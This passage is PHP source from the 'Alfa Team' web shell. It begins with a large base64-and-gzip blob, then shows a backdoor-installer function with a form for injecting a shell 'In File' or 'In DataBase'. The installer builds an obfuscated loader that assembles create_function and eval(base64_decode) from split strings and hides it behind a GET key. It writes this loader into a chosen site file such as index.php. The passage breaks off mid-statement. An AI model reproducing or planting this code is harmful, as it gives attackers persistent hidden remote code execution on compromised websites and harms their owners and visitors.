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';
1085. return 'data:image/png;
1086. base64,'.gzinflate(__ZGVjb2Rlcg($s[$r]));
1087. } function alfainbackdoor(){ alfahead();
1088. echo '<div class=header><center><p><div class="txtfont_header">| Install BackDoor |</div></p><h3><a href=javascript:void(0) onclick="g(\'inbackdoor\',null,\'file\')">| In File | </a><a href=javascript:void(0) onclick="g(\'inbackdoor\',null,\'db\')">| In DataBase | </a></h3></center>';
1089. $error = '<font color="red">Error In Inject BackDoor...!<br>File Loader is not Writable Or Not Exists...!</font>';
1090. $success= '<font color="green">Success...!';
1091. $textarea = "<div style='display:none;
1092. ' id='backdoor_textarea'><div class='txtfont'>Your Shell:</div><p><textarea name='shell' rows='19' cols='103'><?php\n\techo('Alfa Team is Here...!');
1093. \n?></textarea></p></div>";
1094. $select = "<div class='txtfont'>Use:</div> <select name='method' style='width:155px;
1095. ' onChange='inBackdoor(this);
1096. '><option value='alfa'>Alfa Team Uploader</option><option value='my'>My Private Shell</option></select>";
1097. $cwd = 'Example: /home/alfa/public_html/index.php';
1098. if($_POST['alfa1']=='file'){ echo("<center><p><div class='txtfont_header'>| In File |</div></p><p><form onsubmit=\"g('inbackdoor',null,'file',this.method.value,this.file.value,this.shell.value,this.key.value);
1099. return false;
1100. \">{$select} <div class='txtfont'>Backdoor Loader:</div> <input type='text' name='file' size='50' placeholder='{$cwd}'> <div class='txtfont'>Key: </div> <input type='text' name='key' size='10' value='alfa'> <input type='submit' value=' '>{$textarea}</form></p></center>");
1101. if($_POST['alfa2']!=''&&$_POST['alfa3']!=''&&$_POST['alfa4']!=''){ $method = $_POST['alfa2'];
1102. $file = $_POST['alfa3'];
1103. $shell = $_POST['alfa4'];
1104. $key = str_replace(array('"','\''),'',trim($_POST['alfa5']));
1105. if($key=='')$key='alfa';
1106. if($method=='my'){$shell=__ZW5jb2Rlcg($shell);
1107. }else{$shell=$GLOBALS['__ALFA_SHELL_CODE'];
1108. } $code = '<?php if(isset($_GET["alfa"])&&$_GET["alfa"]=="'.$key.'"){$func="cr"."ea"."te_"."fun"."ction";
1109. $x=$func("\$c","e"."v"."al"."(\'?>\'.base"."64"."_dec"."ode(\$c));
1110. ");
